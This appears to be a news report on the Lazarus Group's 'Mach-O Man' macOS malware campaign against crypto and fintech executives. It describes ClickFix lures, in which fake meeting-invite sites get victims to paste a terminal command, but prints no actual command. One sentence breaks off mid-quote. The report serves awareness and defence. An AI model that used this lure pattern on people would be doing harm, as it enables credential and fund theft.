The North Korean state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communication into a direct path to credential theft and data loss, security experts warned Wednesday.
The collective, with an estimated cumulative haul of $6.7 billion since 2017, is targeting fintech, cryptocurrency and other high-value executives and companies, Natalie Newson, senior blockchain security researcher at CertiK, told CoinDesk on Wednesday.
In the past two weeks alone, North Korean hackers have siphoned more than $500 million from the Drift and KelpDAO exploits in what appears to be a sustained campaign. The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as an ongoing, well-funded threat, not just another news headline,” he said.
“What makes Lazarus especially dangerous right now is his level of activity,” Newson said. “KelpDAO, Drift, and now a new malware kit for macOS, all in the same month. This is not a random hack; it is a state-run financial operation running at a scale and speed typical of institutions.”
North Korea has turned cryptocurrency theft into a lucrative domestic industry, and Mach-O Man is just the latest product of that process, he said. While Lazarus created it, other cybercrime groups are also using it.
“It is a modular malware kit for macOS created by the infamous Chollima division of the Lazarus Group. It uses native Mach-O binaries designed for Apple environments where crypto and fintech operate,” he said.
Newson said Mach-O Man uses a delivery method known as ClickFix. “It’s important to be clear because a lot of coverage mixes two different things,” he said. ClickFix is a social engineering technique in which the victim is asked to paste a command into their terminal to fix a simulated connection issue.
It works when Lazarus sends executives an “urgent” meeting invitation via Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch, security expert and founder of threat intelligence firm BCA Ltd.
The link leads to a fake but convincing website that tells them to copy and paste a simple command into their Mac’s terminal to “fix a connection issue.” By doing so, victims provide immediate access to corporate systems, SaaS platforms, and financial resources. By the time they discover they were exploited, it is usually too late.
There are several variations of this attack, security threat researcher Vladimir S. said on
“These fake ‘verification steps’ guide victims through keyboard shortcuts that execute a harmful command,” said Certik’s Newson. “The page looks real, the instructions look normal, and the victim initiates the action themselves, which is why traditional security checks often miss it.”
Most victims of this hack will not realize that their security has been breached until the damage has been done, at which point the malware will also have been deleted.
“They probably don’t know yet,” he said. “If they do, they probably won’t be able to identify which variant affected them.”
